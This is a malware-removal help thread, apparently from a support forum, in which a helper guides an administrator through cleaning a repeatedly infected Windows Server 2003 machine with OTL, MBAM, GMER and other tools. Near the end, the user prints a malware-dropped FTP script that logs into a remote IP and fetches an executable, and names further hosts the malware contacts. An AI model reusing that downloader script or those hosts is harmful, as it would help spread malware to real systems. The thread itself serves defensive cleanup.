Virus on win 2003

Periodically uses to be caught a thread executing some king of *123.exe file with temporary files. it is caught with both nod32 4... and mam.
here i send the log file after running MGtools. thnx

 

here it goes

 

sorry, here it goes after disable MBAM and nod 32 v4. beg your pardon!!

 

more here i send MBAM when detects the thread. And bit defender scan and otl scan

 

reports of: OTL, bitdefender and MBAM when it detects the thread

 

sorry file not added

 

here it goes Thnx

 

that malaware has muted to sh1.exe, onsyn.exe, sh2016.exe, and shsyn.exe and open a conection to IP 202.102.113.202 (china) using irc protocol

 

ok, here we go. Still deleting one by one (in IE) each 015 entry! sorry trusted zone is so full and i cannot delete all them using the tool.

To improve this ill send the two last reports from MBAM, detecting svehost.exe and other pets thnx

 

ok, done. i have added also a partial log file recorded by nod32-v4. and a copy of the pair exe-dat files supposed to be created by virus... The curious thing is : sqlservr.exe creates the files hexserver.exe and hex2016.exe. are they legal. sqlservr is the sql server 2008 r2 express main. and secondly on2016.exe seems to be created by ftp.exe (it is legal.. attending the date of creation). ftp is running on this server to upload files via FTP for a web server.
So are MBAM and NOD32 detecting false positives in this case??. there is someone in china trying to upload or download files from server?
THX for you patience

 

to clarify more ill send also the MBAM detection when nod32 also do. the only thing i cannot explain is why firewall turns off when the threads begin to be detected

 

Finally got a zipeed file with all the threads. I hope you can manage them!!

 

even more using Process Explorer i got captured this it is provoked by a cmd command. in the txt file goes the exact command and it seems to be originated by sqlservr.exe which should be a legigal file rolleyes

 

i have found thats those threads desappear once are detected by MBAM or nod32. but curiously i got this two threads.. onserver2000.exe and sserever.exe. both are gone onces detected by MBA and Nod32. and when begin to run turn off Firewall of windows

 

here we go: i have several unsupported advises.. maybe cause by spanish version?

 

to add more fire i would like to post what i get using gmer. i can see three supisious services without name or name between{fa....} with numbers and letters (sounds like versions and nothing about if they are on off or paused. I hopde this hepls

 

all is done, finally, and here comes the gtools log

 

Hi, I will try to help you while chaslang is away.

From Add/Remove Programs (via Control Panel), please uninstall the below:

• J2SE Runtime Environment 5.0 Update 15
• Java(TM) 6 Update 7

Now we need to make use of OTL by Old Timer.

• Double-click OTL.exe to run (Vista and Win7 right-click and select Run as administrator)
• When OTL opens, copy the text in the code box below and paste it into the text-field.
  
  Code:

  [COLOR="DarkRed"]:otl[/COLOR]
  O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
  O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No CLSID value found.
  O4 - HKLM..\RunOnceEx: [Flags] Reg Error: Invalid data type. File not found
  O4 - HKLM..\RunOnceEx: [Title] UnHackMe Rootkit Check File not found
  [2011/10/17 23:31:41 | 000,000,002 | RHS- | M] () -- C:\WINDOWS\winstart.bat
  [2011/09/19 13:13:39 | 000,709,968 | ---- | C] () -- C:\WINDOWS\is-EO24O.exe
  [2011/05/04 19:19:01 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll84004.dll
  [2011/05/04 19:18:53 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll57487.dll
  [2011/03/31 14:03:23 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll53990.dll
  [2011/02/21 23:04:54 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll78727.dll
  [2011/02/21 23:04:49 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll64189.dll
  [2011/02/21 23:04:46 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll10090.dll
  [2011/02/21 09:35:16 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll62595.dll
  [2011/02/20 22:21:51 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\dll63809.dll
  [2011/09/12 00:23:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Datos de programa\ESET
  [2010/05/11 07:33:15 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Administrador\Datos de programa\Uniblue
  [COLOR="DarkRed"]:services [/COLOR]
  BQMRWOX
  [COLOR="DarkRed"]:files[/COLOR]
  C:\327882R2FWJFW
  C:\32788R22FWJFW
  C:\WINDOWS\system32\sh3.exe
  C:\WINDOWS\system32\shsyn.exe
  sc config BQMRWOX start= disabled /c
  [COLOR="DarkRed"]:commands[/COLOR]
  [purity]
  [emptytemp]
  

• Now click the button.
• OTL may ask to reboot the machine. Please do so if asked.
• Click the OK button.
• When complete, Notepad will open.
• Close Notepad.
• A log file will be located at C:\_OTL\MovedFiles\mmddyyyy_hhmmss.log, where mmddyyyy_hhmmss is the date of the tool run.
• Attach this log to your next message. (How to attach items to your post)

• Now open OTL again and click the button
  Note: This automatically updates the OTL.txt log on your desktop.
• Attach OTL.txt to your next message. (How to attach items to your post)

Now run C:\MGtools\GetLogs.bat by double-clicking it (Vista and Win7 right-click and select Run as Administrator)
Then attach C:\MGlogs.zip to your next message. (How to attach items to your post)
Note: This will automatically update all the logs inside MGlogs.zip

LET ME KNOW HOW THE PC IS RUNNING AFTER YOU HAVE COMPLETED THESE STEPS​

 

Thnx.. Here the files go. I have added a OTL log with LOD and Purity for just in case ...

 

Please re-read my instructions carefully.

 

the pc runs now smoothly. no more spurious threads
thx

 

I was wanting to double-check this log for you but you never attached it.

Glad to hear it. Surf safely!

If you are not having any other malware problems, it is time to do our final steps:

1. We recommend you keep SUPERAntiSpyware and Malwarebytes Anti-Malware for scanning/removal of malware. Unless you purchase them, they provide no protection. They do not use any significant amount of resources ( except a little disk space ) until you run a scan.
2. If we had you use ComboFix, uninstall ComboFix (This uninstall will only work as written if you installed ComboFix on your Desktop like we requested.)
   • Click START then RUN and enter the below into the run box and then click OK. Note the quotes are required
   • "%userprofile%\Desktop\combofix" /uninstall
     • Notes: The space between the combofix" and the /uninstall, it must be there.
     • This will uninstall ComboFix and also reset hidden files and folders settings back to Windows defaults.
3. Go back to step 6 of the READ ME and renable your Disk Emulation software with Defogger if you had disabled it.
4. Any other miscellaneous tools we may have had you install or download can be uninstalled and deleted.
5. If we had you download any registry patches like fixme.reg or fixWLK.reg (or any others), you can delete these files now.
6. If running Vista, it is time to make sure you have reenabled UAC by double clicking on the C:\MGtools\enableUAC.reg file and allowing it to be added to the registry.
7. Go to add/remove programs and uninstall HijackThis if it present
8. Goto the C:\MGtools folder and find the MGclean.bat file. Double click on this file to run this cleanup program that will remove files and folders
   related to MGtools and some other items from our cleaning procedures.
9. If you are running Win 7, Vista, Windows XP or Windows ME, do the below:
   • Refer to the cleaning procedures pointed to by step 7 of the READ ME
     for your Window version and see the instructions to Disable System Restore which will flush your Restore Points.
   • Then reboot and Enable System Restore to create a new clean Restore Point.
10. After doing the above, you should work through the below link:
    • How to Protect yourself from malware!

 

it appeared again this morning i add the MAMB log info and the one you have asked to me it was done but never attached. Beg your pardon

 

Run an OTL scan using these settings...

• Double-click OTL.exe to run (Vista and Win7 right click and select Run as administrator)
• When the window appears, underneath Output at the top-right, make sure Standard Output is selected.
• Select Scan All Users.
• Under Drivers and Services, choose "All" for both.
• Check the boxes beside LOP Check and Purity Check.
• Copy the text in the code box below and paste it into the text-field.
  
  Code:

  netsvcs
  /md5start
  atapi.sys
  csrss.exe
  explorer.exe
  regedit.exe
  services.exe
  svchost.exe
  userinit.exe
  winlogon.exe
  /md5stop
  %systemdrive%\*.*
  %systemroot%\*. /mp /s
  %systemroot%\system32\*.sys /90
  %systemroot%\system32\*.exe /lockedfiles
  %systemroot%\system32\drivers\*.sys /lockedfiles
  

• Now click the button.
• When the scan is complete, Notepad will open with the results of the OTL scan.
• Close Notepad.
• There will be a log file on your desktop entitled OTL.txt.
• Attach OTL.txt to your next message. (How to attach items to your post)

 

ok, done

 

Now we need to make use of OTL by Old Timer.

• Double-click OTL.exe to run (Vista and Win7 right-click and select Run as administrator)
• When OTL opens, copy the text in the code box below and paste it into the text-field.
  
  Code:

  [COLOR="DarkRed"]:otl[/COLOR]
  [2011/11/13 23:24:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Datos de programa\Driver Mender
  [2011/11/18 08:33:53 | 000,000,110 | ---- | M] () -- C:\WINDOWS\System32\shxiangming.exe
  [2011/11/18 08:33:44 | 000,000,072 | ---- | M] () -- C:\WINDOWS\System32\onfxiangming.dat
  [2011/11/16 23:01:27 | 000,000,061 | ---- | M] () -- C:\WINDOWS\System32\sh2020.exe
  [2011/11/16 23:01:14 | 000,000,062 | ---- | M] () -- C:\WINDOWS\System32\onf2020.dat
  [2011/11/16 23:00:51 | 000,000,061 | ---- | M] () -- C:\WINDOWS\System32\sh2016.exe
  [2011/11/16 23:00:30 | 000,000,062 | ---- | M] () -- C:\WINDOWS\System32\onf2016.dat
  [2011/11/16 15:45:17 | 000,000,056 | ---- | M] () -- C:\WINDOWS\System32\onfsyn.dat
  [2011/11/15 17:32:58 | 000,000,074 | ---- | M] () -- C:\WINDOWS\System32\onfserver2000.dat
  [2011/11/14 18:06:41 | 000,000,060 | ---- | M] () -- C:\WINDOWS\System32\onf3.dat
  [COLOR="DarkRed"]:commands[/COLOR]
  [emptytemp]
  [resethosts]
  

• Now click the button.
• OTL may ask to reboot the machine. Please do so if asked.
• Click the OK button.
• When complete, Notepad will open.
• Close Notepad.
• A log file will be located at C:\_OTL\MovedFiles\mmddyyyy_hhmmss.log, where mmddyyyy_hhmmss is the date of the tool run.
• Attach this log to your next message. (How to attach items to your post)

• Now open OTL again and click the button
  Note: This automatically updates the OTL.txt log on your desktop.
• Attach OTL.txt to your next message. (How to attach items to your post)

How are things running now?

 

ok. both logs are done + i have discovered several registry entries very supicious, ill send you and export of them. i have an empty key in the registry correponding to hkey_local_machine\Software\microsoft\windows\securitycenter\svc that doesnot mean no notification for virus discovered?

 

Can you see if these work on Server 2003?

If one doesn't work, just continue on with the next tool.

Now we need to run TDSSKiller by Kaspersky
Follow the instructions here and attach your log when you are finished. (How to attach items to your post)


Please download MBRCheck by GeeksToGo to your desktop.
See the download links under this icon

• Double click MBRCheck.exe to run (Vista and Win7 right click and select Run as Administrator)
• It will show a Black screen with some information that will contain either the below line if no problem is found:
  • Done! Press ENTER to exit...
• Or you will see more information like below if a problem is found:
  • Found non-standard or infected MBR.
  • Enter 'Y' and hit ENTER for more options, or 'N' to exit:
• Either way, just choose to exit the program at this point since we want to see only the scan results to begin with.
• MBRCheck will create a log named similar to MBRCheck_07.16.10_00.32.33.txt which is random based on date and time.
• Attach this log to your next message. (How to attach items to your post)

Now we need to run GMER.
Follow the instructions here and attach your log when you are finished. (How to attach items to your post)

 

well while karpensky and MBRCheck run smothly, in the midle of gmer i got the infamous blue screen.. ill try to do it again. ie turned very unresponsive and slow

 

ok. After goings forth and back i got it is a kind of Sasser virus. It has a .dat file the following ftp code:
open 121.33.253.111
ming
xin
get (whatever).exe
bye

xin and min are the user and password for that ftp server. it is executed by its counterpart .exe which turns off firewall and execute the ftp script
the main thread is onxiangming.exe (352kb)

how can i get ride of that ****ing SASSER type virus?

i has been so crazy and disabled all antivirus and malaware and the first thing happened was a lsass.exe error and a close of LSA.
it uses sh2016.exe, sh2020.exe to get their counterpartes .exe from the IP
125.64.23.180

 

Is there any chance that you can leave this server offline while you do the below? Are any other machines there infected as well?

Download Virus Removal Tool from Here to your desktop

Run the program you have just downloaded to your desktop (it will be randomly named )

First we will run a virus scan

• Click the cog in the upper right
  
  
  
  
• Select down to and including your main drive, once done select the Automatic scan tab and press Start Scan
  
  
  
  
• Allow Virus Removal Tool to delete all infections found
• Once it has finished select report tab (last tab)
• Select Detected threads report from the left and press Save button
• Save it to your desktop and attach to your next post. (How to attach items to your post)

 

after 3 days of scanning finally i got a log file.. and seems to work like a charme. thnx

 

Ok that removed quite a bit. Is the server online or offline? I would leave it offline until you are sure the infection has not returned. I am suspecting that another machine in the area is reinfecting the server.

 

IT happened again. Other attack, but the server is alone, no other machine is on the net.It is a server for web basically. And yes it only happens when it is open to internet, never happens with the nertwork is close.

 

i am going to close the web server. to see the effect... this machine has a fixed ip on internet.

 

Ok i have been checking all the files inside the main dir of the web server and.. OH SURPRISE, i got a .BAT file which is not mine at all. i rename the extension to txt and i would like you to exam it please. I didnt create that bat file.. but more how can it be created inside the main dir of the web server if i only out there .aspx forms?

 

getrunkey.bat is part of MGtools.

Can you run C:\MGtools\GetLogs.bat and attach the latest MGlogs.zip for review?

 

I'll do it, should it be with net connection off???

 

Preferably, yes. You're absolutely sure no other machines are connected to this server?

 

there is a Brother 410 printer only. this is behind a router. when i close the nertwork connection, no infection is activated